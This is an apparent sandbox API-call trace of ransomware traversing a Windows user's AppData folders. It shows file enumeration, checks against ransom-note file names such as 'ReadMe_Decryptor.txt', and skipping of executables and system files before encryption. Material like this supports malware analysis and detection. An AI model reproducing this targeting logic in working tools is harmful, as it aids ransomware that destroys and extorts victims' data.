lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0081.332] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0081.467] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.467] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f766d30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.532] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.532] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.532] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4e2b7e00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x3fe4ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0081.532] lstrcmpW (lpString1="Built-In Building Blocks.dotx", lpString2=".") returned 1 [0081.532] lstrcmpW (lpString1="Built-In Building Blocks.dotx", lpString2="..") returned 1 [0081.532] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.532] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Decryptor_Info.hta") returned -1 [0081.532] PathFindExtensionW (pszPath="Built-In Building Blocks.dotx") returned=".dotx" [0081.532] lstrcmpiW (lpString1=".dotx", lpString2=".exe") returned -1 [0081.532] lstrcmpiW (lpString1=".dotx", lpString2=".sys") returned -1 [0081.532] lstrcmpiW (lpString1=".dotx", lpString2=".lnk") returned -1 [0081.532] lstrcmpiW (lpString1=".dotx", lpString2=".dll") returned 1 [0081.533] lstrcmpiW (lpString1=".dotx", lpString2=".msi") returned -1 [0081.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x77c988 [0081.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x77ca50 [0081.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77c988 | out: hHeap=0x6d0000) returned 1 [0081.533] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77cb78 [0081.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77ca50 | out: hHeap=0x6d0000) returned 1 [0081.533] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4e2b7e00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x3fe4ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0081.533] FindClose (in: hFindFile=0x72a960 | out: hFindFile=0x72a960) returned 1 [0081.533] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4e2b7e00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x3fe4ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0081.533] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0081.533] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4e2b7e00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x3fe4ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0081.533] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.533] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c1e0470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xd01394e0, ftLastAccessTime.dwHighDateTime=0x1d301bc, ftLastWriteTime.dwLowDateTime=0xd01394e0, ftLastWriteTime.dwHighDateTime=0x1d301bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0081.534] lstrcmpW (lpString1="Excel", lpString2=".") returned 1 [0081.534] lstrcmpW (lpString1="Excel", lpString2="..") returned 1 [0081.534] lstrlenW (lpString="Excel") returned 5 [0081.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Excel" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel" [0081.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\" [0081.534] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned 62 [0081.534] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.538] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.538] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c1e0470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xd01394e0, ftLastAccessTime.dwHighDateTime=0x1d301bc, ftLastWriteTime.dwLowDateTime=0xd01394e0, ftLastWriteTime.dwHighDateTime=0x1d301bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.539] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.539] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.539] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xd01394e0, ftLastAccessTime.dwHighDateTime=0x1d301bc, ftLastWriteTime.dwLowDateTime=0xd01394e0, ftLastWriteTime.dwHighDateTime=0x1d301bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0081.539] lstrcmpW (lpString1="XLSTART", lpString2=".") returned 1 [0081.539] lstrcmpW (lpString1="XLSTART", lpString2="..") returned 1 [0081.539] lstrlenW (lpString="XLSTART") returned 7 [0081.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="XLSTART" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0081.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" [0081.540] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 70 [0081.540] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0081.540] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.540] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xd01394e0, ftLastAccessTime.dwHighDateTime=0x1d301bc, ftLastWriteTime.dwLowDateTime=0xd01394e0, ftLastWriteTime.dwHighDateTime=0x1d301bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.543] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.543] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.543] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xd01394e0, ftLastAccessTime.dwHighDateTime=0x1d301bc, ftLastWriteTime.dwLowDateTime=0xd01394e0, ftLastWriteTime.dwHighDateTime=0x1d301bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.543] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0081.543] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xd01394e0, ftLastAccessTime.dwHighDateTime=0x1d301bc, ftLastWriteTime.dwLowDateTime=0xd01394e0, ftLastWriteTime.dwHighDateTime=0x1d301bc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.543] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.543] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0081.544] lstrcmpW (lpString1="IME12", lpString2=".") returned 1 [0081.544] lstrcmpW (lpString1="IME12", lpString2="..") returned 1 [0081.544] lstrlenW (lpString="IME12") returned 5 [0081.544] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IME12" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12" [0081.544] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\" [0081.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned 62 [0081.544] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.548] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.550] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.550] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.550] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.550] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.550] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0081.550] lstrcmpW (lpString1="IMJP12", lpString2=".") returned 1 [0081.550] lstrcmpW (lpString1="IMJP12", lpString2="..") returned 1 [0081.550] lstrlenW (lpString="IMJP12") returned 6 [0081.550] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IMJP12" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12" [0081.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\" [0081.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned 63 [0081.551] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.552] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.552] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.554] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.554] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.554] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.554] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.554] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0081.554] lstrcmpW (lpString1="IMJP8_1", lpString2=".") returned 1 [0081.554] lstrcmpW (lpString1="IMJP8_1", lpString2="..") returned 1 [0081.554] lstrlenW (lpString="IMJP8_1") returned 7 [0081.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IMJP8_1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1" [0081.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\" [0081.555] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned 64 [0081.555] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.556] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.556] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.558] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.558] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.558] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.558] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.558] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0081.558] lstrcmpW (lpString1="IMJP9_0", lpString2=".") returned 1 [0081.558] lstrcmpW (lpString1="IMJP9_0", lpString2="..") returned 1 [0081.559] lstrlenW (lpString="IMJP9_0") returned 7 [0081.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IMJP9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0" [0081.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\" [0081.559] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\") returned 64 [0081.559] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.561] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.561] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.562] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.562] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.562] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0081.562] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.563] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x54b77470, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b77470, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0081.563] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0081.563] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0081.563] lstrlenW (lpString="Internet Explorer") returned 17 [0081.563] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Internet Explorer" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0081.563] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0081.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 74 [0081.563] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.564] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.564] FindNextFileW (in: 